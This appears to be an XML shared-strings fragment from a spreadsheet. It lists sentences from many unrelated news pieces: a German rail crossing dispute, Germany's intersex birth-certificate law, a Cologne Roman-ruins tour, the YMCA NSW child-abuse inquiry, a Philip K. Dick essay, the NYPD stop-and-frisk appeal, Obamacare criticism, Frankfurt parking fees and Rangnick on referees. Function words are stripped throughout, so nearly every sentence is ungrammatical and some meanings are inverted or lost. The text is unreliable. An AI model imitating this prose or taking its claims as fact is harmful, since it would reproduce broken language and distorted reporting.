    <t xml:space="preserve"> The investigation came conclusion could ruled inclination road could result longer vehicles becoming stuck </t>
  </si>
  <si>
    <t xml:space="preserve"> The town , authority responsible road construction , would bear responsibility </t>
  </si>
  <si>
    <t xml:space="preserve"> The reconstruction could therefore result liability disputes </t>
  </si>
  <si>
    <t xml:space="preserve"> Because transportation wood turning possible things , reconstruction railway crossing consented , argued Haas </t>
  </si>
  <si>
    <t xml:space="preserve"> At point , risk train collision vehicle positioned crossing considerably lower railway crossings , account fact midpoint good line sight , directly alongside stopping point </t>
  </si>
  <si>
    <t xml:space="preserve"> The trains , coming central station , must also sufficiently slowed threat collision </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</si>
  <si>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</si>
  <si>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The committee considers reconstruction &amp;quot; Vor Heubach &amp;quot; &amp;apos; Vor Kuhbach &amp;quot; railway crossings , crossing agreements already reached Deutsche Bahn , unproblematic </t>
  </si>
  <si>
    <t xml:space="preserve"> Dieter Thomas Kuhn Stuttgart: The &amp;quot; singing mountain wave &amp;quot; open-air stage Stuttgart - &amp;quot; When summer ? &amp;quot; actually question people &amp;apos;s lips Killesberg Open-Air Theatre Friday evening </t>
  </si>
  <si>
    <t xml:space="preserve"> It genuinely tropical evening Stuttgart </t>
  </si>
  <si>
    <t xml:space="preserve"> This therefore provided ideal conditions pop star , Dieter Thomas Kuhn , band </t>
  </si>
  <si>
    <t xml:space="preserve"> Click image gallery performance &amp;quot; singing mountain wave &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Parents Intersex Kids Can Pick &amp;apos; Gender Undetermined &amp;apos; Germany became first European nation recognize third gender babies born ambiguous genitalia </t>
  </si>
  <si>
    <t xml:space="preserve"> No longer newborns rigidly assigned male female </t>
  </si>
  <si>
    <t xml:space="preserve"> The new law &amp;apos;t require parents declare gender children , allowing parents declare gender &amp;quot; undetermined &amp;quot; &amp;quot; unspecified &amp;quot; birth certificates </t>
  </si>
  <si>
    <t xml:space="preserve"> The aim law take pressure parents might make hasty decisions sex-assignment surgery newborns , fight discrimination intersex </t>
  </si>
  <si>
    <t xml:space="preserve"> One intersex person , according BBC , said years later , &amp;quot; I neither man woman </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I remain patchwork created doctors , bruised scarred </t>
  </si>
  <si>
    <t xml:space="preserve"> An estimated one 2,000 children born year neither boy girl </t>
  </si>
  <si>
    <t xml:space="preserve"> They intersex , part group 60 conditions fall diagnosis disorders sexual development , umbrella term atypical chromosomes , gonads (ovaries testes), unusually developed genitalia </t>
  </si>
  <si>
    <t xml:space="preserve"> Wallis Simpson may intersex </t>
  </si>
  <si>
    <t xml:space="preserve"> Gender identification still well understood , experts United States say sex cannot determined , &amp;apos;s better use best available information assign wait monitor child &amp;apos;s psychological physical development undertaking surgery , </t>
  </si>
  <si>
    <t xml:space="preserve"> New York City psychiatrist Dr</t>
  </si>
  <si>
    <t xml:space="preserve"> Jack Drescher , specializes issues gender identification , said new German law &amp;quot; sounds like good thing </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Intersex children pose ethical dilemma </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Some people life-endangering conditions require surgery , kids , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> You make gender assignment without surgery , see identity develops </t>
  </si>
  <si>
    <t xml:space="preserve"> The science knowing child develop gender identity accurate </t>
  </si>
  <si>
    <t xml:space="preserve"> Nobody answer questions happens </t>
  </si>
  <si>
    <t xml:space="preserve"> It &amp;apos;s like mystery people gay </t>
  </si>
  <si>
    <t xml:space="preserve"> A report filed European Commission 2011 described intersex people different transsexual transgender people , status gender related instead relates biological makeup , neither exclusively male exclusively female , typical clearly defined either </t>
  </si>
  <si>
    <t xml:space="preserve"> These features manifest secondary sexual characteristics , muscle mass , hair distribution , breasts stature; primary sexual characteristics reproductive organs genitalia; chromosomal structures hormones </t>
  </si>
  <si>
    <t xml:space="preserve"> The report also gives overview discrimination faced intersex transgender people realm employment , well levels harassment , violence bias crimes </t>
  </si>
  <si>
    <t xml:space="preserve"> Gender nonconforming boys special camp </t>
  </si>
  <si>
    <t xml:space="preserve"> Already , Australia Nepal allow adults mark male , female &amp;quot; third gender &amp;quot; official documents </t>
  </si>
  <si>
    <t xml:space="preserve"> In June , 52-year-old Australian , Norrie May-Welby , became world &amp;apos;s first recognized &amp;quot; genderless &amp;quot; person winning legal appeal keep &amp;quot; unspecified &amp;quot; gender status life </t>
  </si>
  <si>
    <t xml:space="preserve"> German passports third designation M F -- X , intersex , according Interior Ministry </t>
  </si>
  <si>
    <t xml:space="preserve"> In neighboring France , gender issues still controversial , according news report France 24 </t>
  </si>
  <si>
    <t xml:space="preserve"> In 2011 , dozens French lawmakers strongly Catholic country signed petition &amp;quot; gender theory &amp;quot; withdrawn school textbooks </t>
  </si>
  <si>
    <t xml:space="preserve"> The U</t>
  </si>
  <si>
    <t xml:space="preserve"> website Catholic Online also opposed German law , writing &amp;quot; world dragged new state , gender choice , sexual activity , reverse two pillars civilization </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; One Maryland mother newborn also told Baby Zone would rather see babies assigned gender birth </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Parenting stressful enough without extra limitations , especially &amp;apos;t know gender child , &amp;quot; told parenting website </t>
  </si>
  <si>
    <t xml:space="preserve"> Children need stability certainty </t>
  </si>
  <si>
    <t xml:space="preserve"> Historically , children born male female genitalia called hermaphrodites , named handsome Greek god dual sexuality </t>
  </si>
  <si>
    <t xml:space="preserve"> And little decade ago , medical community thought gender slate could erased redrawn </t>
  </si>
  <si>
    <t xml:space="preserve"> But , many challenging ethical basis surgery , knowing gender identity complex , doctors sometimes get wrong , knowing child feel gender assignment grow </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Back middle 20th century , called &amp;apos; psychiatric emergency , &amp;apos; &amp;quot; said Drescher </t>
  </si>
  <si>
    <t xml:space="preserve"> When kids born , &amp;apos;t call psychiatrist , called surgeon </t>
  </si>
  <si>
    <t xml:space="preserve"> The prevailing theory treat children ambiguous genitalia put forward Dr</t>
  </si>
  <si>
    <t xml:space="preserve"> John Money Johns Hopkins University , held gender malleable </t>
  </si>
  <si>
    <t xml:space="preserve"> He coined term &amp;quot; gender identity &amp;quot; argued social environmental cues -- parents raised child -- interacted child &amp;apos;s genes hormones shape whether person identified male female </t>
  </si>
  <si>
    <t xml:space="preserve"> But one 1966 case , known &amp;quot; John / Joan , &amp;quot; theories became controversial </t>
  </si>
  <si>
    <t xml:space="preserve"> He advised parents boy whose penis severed botched circumcision child fully castrated , removing testicles , well , raise girl </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Money presented case successful case transition , , &amp;quot; said Drescher </t>
  </si>
  <si>
    <t xml:space="preserve"> When boy around 15 , transitioned back boy married woman </t>
  </si>
  <si>
    <t xml:space="preserve"> But 38 , committed suicide </t>
  </si>
  <si>
    <t xml:space="preserve"> Drescher said doctors still &amp;quot; practicing model </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; But 1990s , advent Internet , survivors gender surgeries come forward &amp;quot; happy outcome </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Such case Jim Bruce , 36-year-old writer Montana , born XY male chromosomes ambiguous genitals </t>
  </si>
  <si>
    <t xml:space="preserve"> Doctors &amp;apos;t sure large clitoris small penis convinced could never live &amp;quot; satisfactory life &amp;quot; man </t>
  </si>
  <si>
    <t xml:space="preserve"> So shortly birth 1976 , Bruce &amp;apos;s external organ testes surgically removed raised girl </t>
  </si>
  <si>
    <t xml:space="preserve"> He given female hormones age 12 </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I knew I &amp;apos;t girl , &amp;quot; told ABCNews</t>
  </si>
  <si>
    <t xml:space="preserve"> I unhappy , really difficult ask questions </t>
  </si>
  <si>
    <t xml:space="preserve"> At 18 , set vaginoplasty </t>
  </si>
  <si>
    <t xml:space="preserve"> But depressed knowing something wrong , demanded medical records </t>
  </si>
  <si>
    <t xml:space="preserve"> What found horrifying </t>
  </si>
  <si>
    <t xml:space="preserve"> I sterilized birth -- one ever told </t>
  </si>
  <si>
    <t xml:space="preserve"> Bruce born DSD prevented body producing enough testosterone properly develop genitals </t>
  </si>
  <si>
    <t xml:space="preserve"> After learning truth , changed back man , taking testosterone shots breasts removed </t>
  </si>
  <si>
    <t xml:space="preserve"> Surgery rendered infertile </t>
  </si>
  <si>
    <t xml:space="preserve"> Today , advocates others organization called Interface Project , trying normalize perceptions intersex </t>
  </si>
  <si>
    <t xml:space="preserve"> But Anne Tamar-Mattis , executive director California-based legal group Advocates Informed Choice , worries German law &amp;quot; invites labeling stigma </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; &amp;quot; A lot activists concerned German rule encourage parents make quick decisions give child &amp;apos; undetermined , &amp;apos; &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> We afraid encourage intervention </t>
  </si>
  <si>
    <t xml:space="preserve"> We think better process assigning male female sex , waiting </t>
  </si>
  <si>
    <t xml:space="preserve"> But &amp;apos;t seen law play , speculate </t>
  </si>
  <si>
    <t xml:space="preserve"> Tamar-Mattis said organization supports Australian law &amp;quot; allows adults choose recognized third gender </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; &amp;quot; Adults able make decisions legal gender , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> German law assigning birth </t>
  </si>
  <si>
    <t xml:space="preserve"> That battle young children take point </t>
  </si>
  <si>
    <t xml:space="preserve"> When grown , make decisions bodies </t>
  </si>
  <si>
    <t xml:space="preserve"> But Dr</t>
  </si>
  <si>
    <t xml:space="preserve"> Arlene Baratz , Pittsburgh breast radiologist daughter disorder sexual development helps hundreds others support group , said German law &amp;quot; empower &amp;quot; parents children </t>
  </si>
  <si>
    <t xml:space="preserve"> Baratz &amp;apos;s daughter Katie born male chromosomes , DSD called complete androgen insensitivity syndrome </t>
  </si>
  <si>
    <t xml:space="preserve"> Because androgen receptors faulty , Katie developed female characteristics </t>
  </si>
  <si>
    <t xml:space="preserve"> She vagina , uterus ovaries </t>
  </si>
  <si>
    <t xml:space="preserve"> Now 29 , Katie married University Pennsylvania , resident child psychiatry </t>
  </si>
  <si>
    <t xml:space="preserve"> Though infertile , hopes become parent adoption gestational surrogacy </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The law gives parents space rush making decisions , &amp;quot; said Baratz </t>
  </si>
  <si>
    <t xml:space="preserve"> It gives time tests figure period time write &amp;apos; male &amp;apos; &amp;apos; female </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;apos; This way , OK -- raise child , love child </t>
  </si>
  <si>
    <t xml:space="preserve"> You wonderful baby enjoy fun </t>
  </si>
  <si>
    <t xml:space="preserve"> We &amp;apos;t rush surgery irreversible </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It brings children decision takes away anxiety motivates parents &amp;apos;t feel right thing , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> Ultimately , child decide sex feels comfortable -- &amp;apos;s wonderful thing </t>
  </si>
  <si>
    <t xml:space="preserve"> It empowers children make decision </t>
  </si>
  <si>
    <t xml:space="preserve"> Tourism: Descent Romans Beneath Cologne , sewage channel Roman times , measuring around 120 metres length , preserved </t>
  </si>
  <si>
    <t xml:space="preserve"> Anyone visiting Cologne cannot miss cathedral </t>
  </si>
  <si>
    <t xml:space="preserve"> The two towers , measuring around 157 metres , extend heavens , making Europe &amp;apos;s second tallest church building </t>
  </si>
  <si>
    <t xml:space="preserve"> However , visitors marvel two ornate church towers realise much discover beneath cathedral </t>
  </si>
  <si>
    <t xml:space="preserve"> Rainer Schulze expert comes Cologne underworld </t>
  </si>
  <si>
    <t xml:space="preserve"> The meeting point tours Cologne Tourism Service Centre , right cathedral </t>
  </si>
  <si>
    <t xml:space="preserve"> The tour begins somewhat unspectacular fashion: &amp;quot; We begin underground car park , &amp;quot; says Schulze </t>
  </si>
  <si>
    <t xml:space="preserve"> In 1970s , city fathers wanted car-friendly city , therefore sections old city wall remain tall </t>
  </si>
  <si>
    <t xml:space="preserve"> The majority users parking garage therefore hurry past Roman relics simply drop car </t>
  </si>
  <si>
    <t xml:space="preserve"> However , anyone takes closer look parking level D2 discover archaeological site , cordoned metal railings </t>
  </si>
  <si>
    <t xml:space="preserve"> Ruins measuring five metres tall , made stones around size palm hand , waiting discovered </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; These remnants Roman city wall , built second half first century A</t>
  </si>
  <si>
    <t xml:space="preserve">D , &amp;quot; explains Schulze </t>
  </si>
  <si>
    <t xml:space="preserve"> Before returning daylight , Schulze participants take glance dark , 15-metre shaft upper parking level </t>
  </si>
  <si>
    <t xml:space="preserve"> This well old cathedral , barely noticed days </t>
  </si>
  <si>
    <t xml:space="preserve"> The next stop tour praetorium , participants descend depths </t>
  </si>
  <si>
    <t xml:space="preserve"> Here find residence powerful man north Alps , Praetor CCAA </t>
  </si>
  <si>
    <t xml:space="preserve"> One visitor wants know CCAA means </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The abbreviation stands &amp;quot; Colonia Claudia Ara Agrippinensium &amp;quot; , basically amounts &amp;quot; City Roman Law City Agrippinians , founded Emperor Claudius Site Altars Imperial Cult &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> And Praetorium refers former Governor &amp;apos;s Palace centre power Roman Empire Rhine </t>
  </si>
  <si>
    <t xml:space="preserve"> From exhibition vestibule , tunnel leads preserved Roman sewer , measuring around 120 metres length </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; If want take peaceful stroll along section so-called Cloaca Maxima , &amp;quot; says Schulze , encouraging guests </t>
  </si>
  <si>
    <t xml:space="preserve"> Schulze one surprise </t>
  </si>
  <si>
    <t xml:space="preserve"> Once collected key information desk , leads group 16-metre , accessible shaft </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We Mikwe , ritual Jewish bath , &amp;quot; explains </t>
  </si>
  <si>
    <t xml:space="preserve"> The Jewish congregation built bath deep ground order reach groundwater essential ritual washing </t>
  </si>
  <si>
    <t xml:space="preserve"> To day differing water levels caused varying levels Rhine read lower end Mikwe , origins trace back eighth century </t>
  </si>
  <si>
    <t xml:space="preserve"> The Mikwe form part archaeological area Town Hall Square , construction work set begin shortly </t>
  </si>
  <si>
    <t xml:space="preserve"> However , years complete </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> But opening statement Commission said &amp;quot; never dealt incident child sexual assault within organisation , &amp;quot; Commission told </t>
  </si>
  <si>
    <t xml:space="preserve"> Chief executive officer Phillip Hare asked one case YMCA employee charged child pornography offences , another gym instructor YMCA Caringbah Hall convicted child sexual offences children care 1991 </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Hare told Gail Furness , counsel assisting Commission , knew first case know second one </t>
  </si>
  <si>
    <t xml:space="preserve"> He conceded YMCA &amp;apos;s opening statement commission also inaccurate claiming &amp;quot; external audits YMCA recognised YMCA forefront child safety </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Evidence commission YMCA notified received second lowest four possible ratings Department Education Communities quality audit August year </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Hare , started YMCA 21 , conceded management &amp;quot; &amp;quot; failed recruiting Lord failed make sure staff clear obligations report child safe policy breaches </t>
  </si>
  <si>
    <t xml:space="preserve"> Earlier year Lord convicted sexual offences 12 boys two years worked YMCA </t>
  </si>
  <si>
    <t xml:space="preserve"> He jailed minimum six years </t>
  </si>
  <si>
    <t xml:space="preserve"> But Mr Hare rejected suggestion YMCA cultural problem prevented staff reporting Lord &amp;apos;s breaches child safety </t>
  </si>
  <si>
    <t xml:space="preserve"> Staff gave evidence observed breaches including Lord alone children , babysitting privately , sit lap , saying loved one letting play mobile phone </t>
  </si>
  <si>
    <t xml:space="preserve"> Danielle Ockwell , supervised Lord asked child protection training concerned behaviour , testified found YMCA Caringbah children &amp;apos;s services manager Jacqui Barnat supervised Lord &amp;quot; intimidating hard approach lot time </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The CEO said accept staff &amp;apos;s evidence uncomfortable reporting upwards managers </t>
  </si>
  <si>
    <t xml:space="preserve"> Rather , said , friendships Lord clouded judgements reporting </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Hare said provided view YMCA NSW board lesson organisation &amp;quot; Jonathan Lord incident &amp;quot; &amp;quot; reporting &amp;quot; staff , board agreed </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Hare said decision get staff sign confidentiality agreements soon allegations emerged made YMCA general manager children &amp;apos;s services Liam Whitley </t>
  </si>
  <si>
    <t xml:space="preserve"> He said intended avoid contamination evidence &amp;quot; overzealous &amp;quot; poorly executed </t>
  </si>
  <si>
    <t xml:space="preserve"> YMCA NSW child safe organisation time Jonathan Lord employed 2009 2011 , child sex abuse expert Professor Stephen Smallbone Griffith University told commission </t>
  </si>
  <si>
    <t xml:space="preserve"> He said &amp;quot; serious problems &amp;quot; recruitment , screening , induction , training supervision staff </t>
  </si>
  <si>
    <t xml:space="preserve"> The hearing adjourned December 20 </t>
  </si>
  <si>
    <t xml:space="preserve"> You could call Dostoevsky USA </t>
  </si>
  <si>
    <t xml:space="preserve"> Philip K</t>
  </si>
  <si>
    <t xml:space="preserve"> Dick God seeker , metaphysician , certain extent novels stories also feature recurring themes </t>
  </si>
  <si>
    <t xml:space="preserve"> The external likeness astounding: piercing eyes , beard , high forehead </t>
  </si>
  <si>
    <t xml:space="preserve"> And , Fyodor M</t>
  </si>
  <si>
    <t xml:space="preserve"> Dostoevsky - massive oeuvre - considered revealer apologist Russian soul , Philip K</t>
  </si>
  <si>
    <t xml:space="preserve"> Dick considered American prophet , certainly highly esteemed within native country </t>
  </si>
  <si>
    <t xml:space="preserve"> Some titles released Heyne Verlag publishing house , &amp;apos; Haffman &amp;apos;s cassette &amp;apos; featuring 118 stories distributed Zweitaudenseins </t>
  </si>
  <si>
    <t xml:space="preserve"> Dick illustrates America - kingdom breathtaking technical progress , paired paranoia , fixation security belief chosen </t>
  </si>
  <si>
    <t xml:space="preserve"> Dick &amp;apos; God experiences &amp;apos; , later books read like mixture Book Revelation computer manual </t>
  </si>
  <si>
    <t xml:space="preserve"> Perhaps crazy , perhaps drugs affected brain </t>
  </si>
  <si>
    <t xml:space="preserve"> He realised , early , computers divinities </t>
  </si>
  <si>
    <t xml:space="preserve"> He wrote &amp;apos; Theology Computer &amp;apos; questioned separates humans machine , creator creation </t>
  </si>
  <si>
    <t xml:space="preserve"> That &amp;quot; Blade Runner &amp;quot; problem </t>
  </si>
  <si>
    <t xml:space="preserve"> Killing </t>
  </si>
  <si>
    <t xml:space="preserve"> A master science fiction </t>
  </si>
  <si>
    <t xml:space="preserve"> A fantastic writer </t>
  </si>
  <si>
    <t xml:space="preserve"> His stories inspired film producers Ridley Scott , Paul Verhoeven Steven Spielberg </t>
  </si>
  <si>
    <t xml:space="preserve"> The latter story particularly significant </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Minority Report &amp;quot; originates year 1956 , exudes scent Cold War McCarthy Tribunal </t>
  </si>
  <si>
    <t xml:space="preserve"> Here principle &amp;quot; Pre-Crime &amp;quot; developed , i</t>
  </si>
  <si>
    <t>e</t>
  </si>
  <si>
    <t xml:space="preserve"> something less official doctrine within White House </t>
  </si>
  <si>
    <t xml:space="preserve"> In Dick &amp;apos;s world , alarmingly similar , mutants look future - police access insight </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We arrest individuals &amp;apos;ve broken law , &amp;quot; says government official </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We get first , commit act violence &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> And: &amp;quot; In society major crimes , detention camp full would-be criminals &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> They read time streams </t>
  </si>
  <si>
    <t xml:space="preserve"> They assume bad things going happen prevent criminal thought turning action </t>
  </si>
  <si>
    <t xml:space="preserve"> Dick &amp;apos;s tale acts blueprint anti-terror laws phone tapping madness NSA </t>
  </si>
  <si>
    <t xml:space="preserve"> Anticipation attack: This also Obama &amp;apos;s drone philosophy practices work </t>
  </si>
  <si>
    <t xml:space="preserve"> However , Dick &amp;apos;s story yet finished </t>
  </si>
  <si>
    <t xml:space="preserve"> The Police Chief argues division power , military controls daily life - left State </t>
  </si>
  <si>
    <t xml:space="preserve"> Then watcher watched convicted future crime </t>
  </si>
  <si>
    <t xml:space="preserve"> The system slips </t>
  </si>
  <si>
    <t xml:space="preserve"> It perfect , lies </t>
  </si>
  <si>
    <t xml:space="preserve"> It devises conditions </t>
  </si>
  <si>
    <t xml:space="preserve"> It accepts errors victims , builds </t>
  </si>
  <si>
    <t xml:space="preserve"> The system creates threat fighting </t>
  </si>
  <si>
    <t xml:space="preserve"> To read Philip K</t>
  </si>
  <si>
    <t xml:space="preserve"> Dick means get closer truth , time time </t>
  </si>
  <si>
    <t xml:space="preserve"> Court blocks ruling NYPD stop-and-frisk policy A federal appeals court Thursday blocked judge &amp;apos;s order requiring changes New York Police Department &amp;apos;s stop-and-frisk program removed judge case </t>
  </si>
  <si>
    <t xml:space="preserve"> Circuit Court Appeals said decisions Judge Shira Scheindlin stayed pending outcome appeal city </t>
  </si>
  <si>
    <t xml:space="preserve"> The judge ruled August city violated Constitution way carried program stopping questioning people </t>
  </si>
  <si>
    <t xml:space="preserve"> The city appealed findings remedial orders , including decision assign monitor help police department changes policy training program associated </t>
  </si>
  <si>
    <t xml:space="preserve"> The appeals court heard arguments Tuesday requested stay </t>
  </si>
  <si>
    <t xml:space="preserve"> The appeals court said judge needed removed case ran afoul code conduct U</t>
  </si>
  <si>
    <t xml:space="preserve"> judges compromising necessity judge avoid appearance partiality part series media interviews public statements responding publicly criticism court </t>
  </si>
  <si>
    <t xml:space="preserve"> The judge ruled police officers violated civil rights tens thousands people wrongly targeting black Hispanic men stop-and-frisk program </t>
  </si>
  <si>
    <t xml:space="preserve"> In August , New York City agreed end practice storing names addresses people whose cases dismissed police stop </t>
  </si>
  <si>
    <t xml:space="preserve"> An oral argument city &amp;apos;s appeal scheduled sometime March 14 , 2014 </t>
  </si>
  <si>
    <t xml:space="preserve"> The stop-and-frisk tactic criticized number civil rights advocates </t>
  </si>
  <si>
    <t xml:space="preserve"> Stop-and-frisk around decades form , recorded stops increased dramatically administration independent Mayor Michael Bloomberg all-time high 2011 684,330 , mostly black Hispanic men </t>
  </si>
  <si>
    <t xml:space="preserve"> A lawsuit filed 2004 four men , minorities , became class action case </t>
  </si>
  <si>
    <t xml:space="preserve"> Supporters changes NYPD &amp;apos;s stop-and-frisk program say changes end unfair practices , mold trusted effective police force affect police departments use policy </t>
  </si>
  <si>
    <t xml:space="preserve"> Opponents say changes would lower police morale crime , waste money solve broader problem police force pressure shrinking thousands officers last decade </t>
  </si>
  <si>
    <t xml:space="preserve"> The judge noted &amp;apos;t putting end stop-and-frisk practice , constitutional , reforming way NYPD implemented stops </t>
  </si>
  <si>
    <t xml:space="preserve"> Obama &amp;apos;s Health Care Walk Back Amid firestorm criticism , President Obama yesterday walked back oft-repeated , unambiguous promise &amp;quot; like health plan , keep </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; With hundreds thousands receiving cancellation notices providers , Republicans slammed president recent days misleading American public </t>
  </si>
  <si>
    <t xml:space="preserve"> Yesterday , Obama tweaked original pledge </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; For vast majority people health insurance works , keep , &amp;quot; said speech Boston </t>
  </si>
  <si>
    <t xml:space="preserve"> Addressing called &amp;quot; flurry news &amp;quot; cancellations , Obama urged Americans receiving notices shop new coverage marketplace </t>
  </si>
  <si>
    <t xml:space="preserve"> Most people going able get better , comprehensive health care plans price even cheaper projected </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; You &amp;apos;re going get better deal , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Let say directly Americans: deserve better , &amp;quot; Sebelius said testimony House Energy Commerce Committee Washington </t>
  </si>
  <si>
    <t xml:space="preserve"> Sebelius , overseeing implementation Affordable Care Act , said launch online marketplace gone &amp;quot; miserably &amp;quot; since October </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I frustrated angry anyone , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> I eager earn confidence back </t>
  </si>
  <si>
    <t xml:space="preserve"> An exasperated Sebelius uttered phrase , caught hot mic , aide seated behind yesterday &amp;apos;s House hearing following contentious exchange Rep</t>
  </si>
  <si>
    <t xml:space="preserve"> Billy Long , R-Mo </t>
  </si>
  <si>
    <t xml:space="preserve"> , whether required enroll Obamacare </t>
  </si>
  <si>
    <t xml:space="preserve"> More three hours hearing , Long repeatedly pressed Sebelius &amp;quot; architect &amp;quot; Affordable Care Act voluntarily forgone government-sponsored insurance purchase plan HealthCare</t>
  </si>
  <si>
    <t xml:space="preserve">gov , pitching millions Americans </t>
  </si>
  <si>
    <t xml:space="preserve"> In small town New Zealand , Burt Munro considered lovable oddball , resolved compete race America 1920 motorbike </t>
  </si>
  <si>
    <t xml:space="preserve"> In spite heart defect , Burt could deterred pursuing dream </t>
  </si>
  <si>
    <t xml:space="preserve"> With savings , donations mortgage old workshop , set Los Angeles ship </t>
  </si>
  <si>
    <t xml:space="preserve"> The film followed coffee , tea cake </t>
  </si>
  <si>
    <t xml:space="preserve"> Learning rather unemployment: Tourism pilot project untrained A pilot project tourist industry launched today Mecklenburg lake district </t>
  </si>
  <si>
    <t xml:space="preserve"> Under management Federal Employment Agency , 49 men women already working within industry untrained workers , trained qualified hotel restaurant staff course three winters </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; What &amp;apos;s innovative six-month courses end diplomas , &amp;quot; said Carmen Wiechert Neubrandenburg Employment Agency </t>
  </si>
  <si>
    <t xml:space="preserve"> There many benefits: The participants unemployed , companies receive trained skilled workers , continually increasing demand hotels restaurants , agency fund unemployment </t>
  </si>
  <si>
    <t xml:space="preserve"> Also involved project Chamber Industry Commerce Neubrandenburg German Hotel Restaurant Association (Deutsche Hotel- und Gaststätte , Dehoga) Mecklenburg-Western Pomerania </t>
  </si>
  <si>
    <t xml:space="preserve"> Frankfurt parking fees increase dramatically Parking Frankfurt could soon noticeably expensive </t>
  </si>
  <si>
    <t xml:space="preserve"> The City Magistrate today discussed submission head department transport , Stefan Majer (Green Party)</t>
  </si>
  <si>
    <t xml:space="preserve"> According proposal , parking fees increased 50 per cent </t>
  </si>
  <si>
    <t xml:space="preserve"> This increase , however , result raised prices , rather fact time interval permitted parking meters ticketing machines reduced 30 20 minutes </t>
  </si>
  <si>
    <t xml:space="preserve"> The City Council must reach decision December </t>
  </si>
  <si>
    <t xml:space="preserve"> The Retail Committee Frankfurt Chamber Industry Commerce believes &amp;quot; good idea &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> The option parking right outside businesses &amp;quot; advantage smaller retailers must underestimated </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> The Verkehrsclub Deutschland (German Traffic Club) opinion increase two decades &amp;quot; completely appropriate actually long overdue &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Local public transport also become expensive </t>
  </si>
  <si>
    <t xml:space="preserve"> Rangnick scolding refs: Mane diver As satisfied Ralf Rangnick present winning form Austrian Bundesliga table-toppers , Red Bull Salzburg , Sporting Director &amp;quot; Bulls &amp;quot; expressed equal disappointment referees </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; There currently dangerous trend , Mane Alan dubbed &amp;apos; divers &amp;apos; , &amp;quot; said press conference Salburg Thursday , defence two tricky offensive players </t>
  </si>
  <si>
    <t xml:space="preserve"> The recent cause Rangnick &amp;apos;s criticism yellow card Mane 3: 0 Grödig last Sunday , whereby Senegalese striker penalised supposed play acting - admittedly justified , shown TV footage </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; A blatant wrong decision , &amp;quot; commented Rangnick , referred Harkam &amp;quot; completely depth &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Harkam also played &amp;quot; part &amp;quot; escalation Salzburg Coach Roger Schmidt Grödig Trainer Adi Hütter game </t>
  </si>
  <si>
    <t xml:space="preserve"> He firmly defended German compatriot: &amp;quot; In individual situation I would behaved way Roger Schmidt &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Schmidt wish contact colleagues skirmish Hütter </t>
  </si>
  <si>
    <t xml:space="preserve"> I know </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; After , I one insulted , &amp;quot; emphasised 46-year-old </t>
  </si>
  <si>
    <t xml:space="preserve"> However , regard winning run , Rangnick sang team &amp;apos;s praises </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; There two words it: Really good , &amp;quot; stated </t>
  </si>
  <si>
    <t xml:space="preserve"> There lot criticise </t>
  </si>
  <si>
    <t xml:space="preserve"> Most , manner team playing impressive </t>
  </si>
  <si>
    <t xml:space="preserve"> We must stay composed keep </t>
  </si>
  <si>
    <t xml:space="preserve"> There hardly squad changes winter transfer window </t>
  </si>
  <si>
    <t xml:space="preserve"> There major reason change anything </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Unless player comes forward expresses desire leave club , &amp;quot; explained Rangnick </t>
  </si>
  <si>
    <t xml:space="preserve"> Tripodi denies influenced Obeid Former NSW Labor minister Joe Tripodi investigated state &amp;apos;s corruption watchdog </t>
  </si>
  <si>
